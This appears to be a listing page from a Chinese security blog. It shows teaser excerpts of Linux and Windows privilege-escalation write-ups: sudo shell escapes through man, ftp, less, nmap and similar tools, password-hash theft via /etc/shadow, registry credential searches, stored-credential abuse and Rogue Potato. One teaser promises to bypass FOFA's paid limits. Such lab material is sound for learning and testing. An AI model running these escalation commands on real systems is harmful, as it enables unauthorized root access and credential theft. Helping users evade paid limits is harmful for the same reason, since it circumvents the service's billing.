-
sudo提权 - man
man 命令是 Linux 下的帮助指令,通过 man 指令可以查看 Linux 中的指令帮助、配置文件帮助和编程帮助等信息。 sudo man man !/bin/sh ... REX_Null1- 0
- 0
- 3
-
SAM和SYSTEM文件进行备份读取
视频播放至7:15后才是该帖子内容 Security Accounts Manager又称SAM,用于存储本地用户帐户的安全信息。 这些哈希用密钥加密的,但这个密钥可以在SYSTEM的文件中找到。 如果你能读取到SAM和系统文件,则可以提取到哈希的密码。 SAM/SYSTEM Locations SAM和SYSTEM文件位于C:\\Windows\\System32\\config directo…... REX_Null1- 0
- 0
- 2
-
sudo提权 - apache2
在没有 shell 转义序列的情况下,可以使用sudo来操作apache2进行提权: sudo apache2 -f /etc/shadow john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt... REX_Null1- 0
- 0
- 28
-
sudo提权 - ftp
FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。 sudo提权 - ftp sudo ftp !/bin/sh ... REX_Null1- 0
- 0
- 1
-
搜索注册表处的密码提权
(由于某些原因,有时密码会被存储在注册表中。) 可以在注册表中搜索包含 "password "的键和值。 reg query HKLM /f password /t REG_SZ /s #本地机器注册表项 reg query HKCU /f password /t REG_SZ /s #当前用户注册表项 我们可以手动验证这些:(查询注册表) reg query "HK…... REX_Null1- 0
- 0
- 5
-
Scheduled Tasks - 计划任务提权
任务通常使用创建它们的用户的权限运行,但管理员可以配置以其他用户(包括系统)身份运行,那我们就可以利用这点进行提权 什么是Scheduled Tasks Scheduled Tasks是任务计划程序,Scheduled Tasks可以在计算机上自动执行你创建的任务。 原理: Task Scheduler通过监视你选择的条件(称为触发器),然后在满足这些条件时执行任务(例如 每 5 分钟)或由某个事…... REX_Null1- 0
- 0
- 2
-
弱文件权限 - 可读 /etc/shadow 提权
/etc/shadow文件包含用户密码哈希,通常只有root用户才能读取。 请注意,环境里的/etc/shadow文件可由全部用户读取: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ 查看/e…... REX_Null1- 0
- 0
- 0
-
sudo提权 - nmap
nmap是网络扫描和嗅探工具包 #nmap的sudo提权命令(禁用输入回显) TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF #nmap的sudo提权命令(利用nmap版本2.02至5.21的交互模式) sudo nmap --interactive nmap…... REX_Null1- 0
- 0
- 5
-
弱文件权限 - 可写 /etc/shadow 提权
/etc/shadow 文件包含用户密码哈希值,通常只有 root 用户才能读取该文件。 请注意,虚拟机上的 /etc/shadow 文件是可写的: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ …... REX_Null1- 0
- 0
- 2
-
sudo提权 - iftop
iftop 是一个用于实时监视网络流量的工具。 shift+1也就是!感叹号可以执行命令。 命令输入: sudo iftop 然后可以看到一个流量监控的界面 然后按下 Shift+1 感叹号! 可以调出命令行 接下来输入 ! /bin/sh 直接提权 ... REX_Null1- 0
- 0
- 3
-
利用存储的凭证提升权限
通过存储凭证提升权限 RunAs 通过存储凭证提升权限 在目标主机传shell弹回来后,我们应该立即开始执行手动枚举,以便在我们开始使用工具之前更好地了解我们正在使用的是什么。 这挺重要,因为搜索存储的凭据应该是获得据点前首先执行的手动命令之一。 手动枚举存储的凭据 查找存储的凭据可以使用一个简单的命令来完成: cmdkey /list 这里我们可以看到本地Admin账户的凭证已经存储,可以用来执…... REX_Null1- 0
- 0
- 2
-
弱文件权限 - 可写 /etc/passwd 提权
/etc/passwd 文件包含用户账户信息。它是可读的,但通常只有 root 用户才能写入。历史上,/etc/passwd 文件包含用户密码哈希值,一些 Linux 版本仍允许在其中存储密码哈希值。 请注意,/etc/passwd 文件是可写的: ls -l /etc/passwd 运行结果: user@debian:~$ ls -l /etc/passwd -rw-r--rw- 1 root …... REX_Null1- 0
- 0
- 1
-
sudo提权 - nano
nano 是一个字符终端的文本编辑器,是Pico的复制品;它比vi/vim要简单得多,比较适合Linux 初学者使用,某些Linux发行版的默认编辑器就是nano。 sudo nano ctrl+r ctrl+x 看到这个界面 就可以执行命令了 ... REX_Null1- 0
- 0
- 1
-
可利用的 GUI 应用程序提权
在某些(较旧)版本的 Windows 中,用户可以获得使用管理员权限运行某些 GUI 应用的权限。 通常有许多方法可以生成来自GUI应用内的命令提示,包括使用原生 Windows 功能。 Since 父过程运行时具有管理员权限,生成的命令提示也将运行这些权限 实操 由于本文中的演示需要GUI,假设在初始枚举期间我们就找到了用户 user 登录的凭据并且使用RDP/3389 上打开。 启动 RDP会…... REX_Null1- 0
- 0
- 8
-
弱服务权限daclsvc提权
弱服务权限daclsvc提权 模拟获取到内网机器 xfreerdp连接上去 xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 root@ip-10-10-25-36:~/Desktop# xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 connect…... REX_Null1- 0
- 0
- 3
-
sudo提权 - find
find 命令用于在指定目录下查找文件和目录。 提权利用 收集具有SUID权限的文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; /表示从文件系统的顶部(根)开…... REX_Null1- 0
- 0
- 2
-
Rogue Potato - 土豆提权
4:35当前帖子内容 Rogue Potato是使用欺骗攻击的攻击名称 同时进行NTLM中继攻击以获得系统权限 该攻击诱使Windows作为系统进行身份验证 用户使用NTLM访问一个假的HTTP服务器;NTLM凭据 然后NTLM凭据将其转告到SMB以获得命令执行 提权条件 1.本地NTLM中继获取SYSTEM令牌 2.SeImpersonatePrivilege特权 测试中任意用户都可以通过本地N…... REX_Null1- 0
- 0
- 13
-
sudo提权 - less
less工具是对文件或者其他输出进行分页显示的工具 sudo less /etc/profile 回车一下就会看到底部有个: 输入 !/bin/sh ... REX_Null1- 0
- 0
- 6
-
秘密揭晓:FOFA个人永久专业版如何突破付费版本限制?
fofa最近取消了个人永久专业版,并且需要按月进行收费了,看着这个会员费用,我也是泪目了,xdm。 那如何突破付费限制呢? 以下是没突破前的截图 当然这只是其中一种, 还有就是被限制了10000页如何突破? 以下是突破后的截图 实战突破fofa付费版本限制... REX_Null1- 0
- 0
- 20.7k
-
sudo提权 - more
more,是linux的一个命令,类似cat命令,会以一页一页的显示,方便使用者逐页阅读。 直接按shift+1,感叹号!进行输入命令 !/bin/sh 回车后 ... REX_Null1- 0
- 0
- 5
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{mission.data.mission.credit}}积分
我的优惠劵
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×
没有优惠劵可用!